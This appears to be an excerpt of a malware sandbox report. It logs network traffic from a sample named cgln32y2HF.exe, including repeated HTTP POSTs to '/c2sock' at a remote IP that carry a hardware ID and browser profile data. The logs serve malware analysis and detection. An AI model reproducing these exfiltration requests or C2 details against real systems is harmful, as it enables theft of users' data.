                                                        Nov 13, 2024 10:52:48.601419926 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.601475954 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.649415016 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.649565935 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.699333906 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.699501991 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.749481916 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.749633074 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.797408104 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.797558069 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.849512100 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.849658012 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.898266077 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.898364067 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.950020075 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.950165987 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.001996994 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.002129078 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.049474001 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.049633026 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.097728968 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.097878933 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.145412922 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.145503044 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.193536043 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.193614006 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.241390944 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.241481066 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.289360046 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.289603949 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.341531038 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.341674089 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.393491983 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.393630981 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.441369057 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.441450119 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.493804932 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.493938923 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.541990042 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.542104006 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.594199896 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.594288111 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.641509056 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.641710997 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.689591885 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.689783096 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.737443924 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.737533092 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.785394907 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.785451889 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.833369970 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.833492041 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.881489038 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.881546021 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.929375887 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.929471970 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:49.978209972 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:49.978456020 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.025631905 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.025872946 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.077433109 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.077516079 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.125416994 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.125521898 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.173444033 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.173533916 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.225471973 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.225569963 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.277439117 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.277493954 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.329639912 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.329713106 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.381556988 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.381661892 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.429572105 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.429663897 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.481463909 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.481698036 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.529377937 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.529609919 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.577440023 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.577640057 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.629376888 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.629556894 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.677493095 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.677736044 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.729629993 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.729788065 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.777587891 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:50.777708054 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:50.810826063 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:51.122725964 CET4998380192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:51.128950119 CET804998394.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:51.129143000 CET4998380192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:51.129193068 CET4998380192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:51.129554987 CET4998380192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:51.134027004 CET804998394.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:51.134380102 CET804998394.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:59.611995935 CET804998394.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:59.612142086 CET4998380192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:59.612231016 CET4998380192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:59.617177010 CET804998394.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:59.906548977 CET4998480192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:59.911437988 CET804998494.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:59.911680937 CET4998480192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:59.911824942 CET4998480192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:59.912281990 CET4998480192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:59.916625977 CET804998494.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:59.917211056 CET804998494.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:08.398130894 CET804998494.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:08.398262024 CET4998480192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:08.398365021 CET4998480192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:08.405067921 CET804998494.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:08.826884985 CET4998580192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:08.831962109 CET804998594.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:08.832578897 CET4998580192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:08.832735062 CET4998580192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:08.833134890 CET4998580192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:08.837568045 CET804998594.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:08.837934017 CET804998594.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:17.308381081 CET804998594.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:17.308528900 CET4998580192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:17.310117960 CET4998580192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:17.315023899 CET804998594.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:17.607824087 CET4998680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:17.612835884 CET804998694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:17.612921953 CET4998680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:17.613392115 CET4998680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:17.613775015 CET4998680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:17.618221998 CET804998694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:17.618586063 CET804998694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:26.118911982 CET804998694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:26.119013071 CET4998680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:26.119100094 CET4998680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:26.126106024 CET804998694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:26.411230087 CET4998780192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:26.416451931 CET804998794.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:26.416531086 CET4998780192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:26.416662931 CET4998780192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:26.417109013 CET4998780192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:26.421567917 CET804998794.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:26.421910048 CET804998794.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:35.006238937 CET804998794.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:35.006309032 CET4998780192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:35.006419897 CET4998780192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:35.021198988 CET804998794.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:35.330020905 CET4998880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:35.335205078 CET804998894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:35.335480928 CET4998880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:35.337399960 CET4998880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:35.337399960 CET4998880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:35.342370033 CET804998894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:35.342386961 CET804998894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:43.823664904 CET804998894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:53:43.823781967 CET4998880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:43.823868990 CET4998880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:53:43.828764915 CET804998894.158.244.69192.168.2.5
                                                        • 94.158.244.69
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.54978894.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:51:39.363364935 CET190OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 16455
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:51:39.363765001 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                        Nov 13, 2024 10:51:39.368891001 CET1236OUTData Raw: 24 d1 70 17 55 8a e1 a7 ef b0 09 eb 87 c2 ff 92 d6 83 33 a2 34 3b 9b 39 28 46 8c 45 c5 5b ae 83 59 29 3e f4 5c ac 21 19 95 91 c7 98 49 40 6a d1 a6 ed ce 6b 36 b3 86 f8 e2 cc e7 f7 c3 b3 9e 3f 91 fb db 90 88 41 d8 4d 33 92 44 a1 d0 da fe ae 28 cd
                                                        Data Ascii: $pU34;9(FE[Y)>\!I@jk6?AM3D(ey9zqs2X&luu;wEib"J-/#Gz'h.hLClN!J*v8hpl4>7&ethEC=[jT\4[DhU 3j?>?>
                                                        Nov 13, 2024 10:51:39.369379044 CET4095OUTData Raw: fa c0 fe 1f 00 00 00 48 1f d8 ff 03 00 00 00 e9 03 fb 7f 00 00 00 20 7d 60 fd 07 00 00 00 d2 07 d6 7f 00 00 00 20 7d e0 f7 7f 00 00 00 20 7d e4 07 de 11 72 59 4d 10 ff 3e f7 5f b9 85 ac d6 ff 97 03 35 01 00 f0 6d 71 30 ff b1 28 3d 7d 9a 79 b9 e9
                                                        Data Ascii: H }` } }rYM>_5mq0(=}y9+ZDiMfej}O]'6=;YDgw(+T$-x!p&,=kJ+9IbOVix2~,&ZY#-Em4j2^^kNbK:S


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.54983694.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:51:48.387343884 CET190OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 19016
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:51:48.387384892 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                        Nov 13, 2024 10:51:48.392249107 CET6180OUTData Raw: 0f 3f 8e ba 36 34 e6 9e 4d 7a 41 91 60 90 d8 c4 4d 83 5d 5a 14 99 a4 d0 5d 69 0c 05 72 77 4a ae 32 a1 21 18 8d 3b 5f f3 ed c1 fa 59 ae 75 fe 7c 75 df 1a 8e 37 34 de 85 54 13 66 68 9e ed ee ba 87 02 56 f3 a3 cc 6c 34 74 96 dc ed 46 05 fd 66 62 d9
                                                        Data Ascii: ?64MzA`M]Z]irwJ2!;_Yu|u74TfhVl4tFfbS!ymEC/}#gRq&! T_g?nB9&F\(n}viuQT2Xk]P%SEXIbJ!b2eQ?(G
                                                        Nov 13, 2024 10:51:48.392323017 CET1712OUTData Raw: 07 fa 15 34 6b 5f 95 05 a3 ca aa 1b 76 b7 b8 28 e6 26 f4 a2 11 17 b8 a5 eb 4b d3 fd c2 dc c8 08 83 3e 8b 8f 32 09 3d 3f 7d b6 35 a5 e9 73 d3 dd 2e f3 ad 40 32 19 06 77 17 27 89 ba ff 3f 26 c6 b1 f1 c1 f8 64 fc 30 be 11 00 00 00 00 00 00 00 b8 54
                                                        Data Ascii: 4k_v(&K>2=?}5s.@2w'?&d0TzYs ZLD^_Tz^'nsG*?"p~PK#m.PPKw&mYEdge/Default/BrowserDB/CURRENTuts


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.54988094.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:51:57.428078890 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:51:57.428469896 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.54992994.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:52:06.415471077 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:52:06.415994883 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.54997894.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:52:15.191611052 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:52:15.191987038 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.54997994.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:52:24.187668085 CET190OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 20500
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:52:24.187920094 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
                                                        Nov 13, 2024 10:52:24.192631006 CET1236OUTData Raw: 46 69 62 32 1e ee ca 99 77 3f 00 ba 9e 61 ad 56 46 47 1f 78 73 66 e4 e4 ce 8d ae b6 ee 91 b5 2f b4 ee 94 9b 17 53 6f ca 8e 1c da dd bd 7f 2c 65 9d 2f 47 cb dc de 1e 7b 67 dd b4 ee 46 ee 53 b3 73 33 af ca ce 6f 6b 1d 5b a5 46 17 53 37 6e 3c 8a a9
                                                        Data Ascii: Fib2w?aVFGxsf/So,e/G{gFSs3ok[FS7n<zmw2}FO"#7dGAhu[?!7^e(w_\>W7]$jQ(hyXH;kFoU_;m&gGvN{{7>>gMc
                                                        Nov 13, 2024 10:52:24.193008900 CET2472OUTData Raw: 9c 9c a9 b5 ca 16 ce 17 ca 95 c2 99 4a d4 70 2d 7f a9 36 bf 6b a8 df b9 cf 96 8a e5 c2 ee f2 6c f4 a9 76 b9 95 d0 ce dc 79 d7 81 bb 77 ed 3f 78 d7 9e 83 fb f7 16 f7 ef dd 73 cf ae 67 e6 a6 93 33 99 9b 83 5f 0e 76 e6 72 ed 99 8d 26 7b a3 79 5d 3b
                                                        Data Ascii: Jp-6klvyw?xsg3_vr&{y];k|}zS~X{=/%%x\%+N7g')mg4gqV#gjfV9S2'stjhnvr,U*kO}9X~wg
                                                        Nov 13, 2024 10:52:24.193042040 CET2472OUTData Raw: 1f 87 cf 87 8d b0 18 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 cf ea fa 74 22 93 18 08 32 99 97 b7 7e f2 95 4f 6d 6a 45 d3 ed e8 0b 7b ae 6b 45 53 9d e8 50 2b 9a ec 44 73 c3 e9 5c 26 d1 89
                                                        Data Ascii: et"2~OmjE{kESP+Ds\&Gc^>qW>ZJrSunKA?[MO_e/RD|jJ=uG#`w$/f#tw$I^:xx
                                                        Nov 13, 2024 10:52:24.193082094 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Nov 13, 2024 10:52:24.193310022 CET724OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.54998094.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:52:33.111166000 CET189OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 1135
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:52:33.111530066 CET1135OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.54998294.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:52:42.327802896 CET191OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 594620
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:52:42.328429937 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
                                                        Nov 13, 2024 10:52:42.332973957 CET1236OUTData Raw: 55 52 b6 5d f7 54 1a e8 31 0e 9e 3b c4 d1 4f 1c d4 01 f2 79 bf a6 ff d7 9a ff b1 f0 df 5e 43 59 7c 43 73 b3 e4 df 95 58 f8 f9 45 d7 e7 8f eb f9 ef 5f 2f 49 cb 7b d7 a5 27 eb be cc e7 5c 5b 69 2c d7 79 8d a5 d1 f7 cf c8 82 7f 79 26 59 c7 b1 5f 24
                                                        Data Ascii: UR]T1;Oy^CY|CsXE_/I{'\[i,yy&Y_$)~O>c_\Xyv.Jcj+MxJ,uh^RW^~Ap^;+a[)/TS_+2/^4gWryLJtxW_VcyKP?'yO
                                                        Nov 13, 2024 10:52:42.333410025 CET7416OUTData Raw: e0 7d 53 76 1e 68 5e 29 c6 06 e9 38 9d 27 e3 63 c1 71 3b 38 3f 91 ea 09 29 96 fd d9 fe 67 db 9f ed 80 64 78 54 eb c7 43 ce 87 f0 3a 40 ee 7f 74 dc f8 60 50 9f c7 ad ce ae ff c3 79 57 5d 20 fc 0f 46 88 6b 71 5f cd 16 07 c6 0c 8f 3b 1e 4f 56 ad 20
                                                        Data Ascii: }Svh^)8'cq;8?)gdxTC:@t`PyW] Fkq_;OV C}u##5?Nkv,R/(5:__mEIIyoB0>`z|)d~9lM=~?
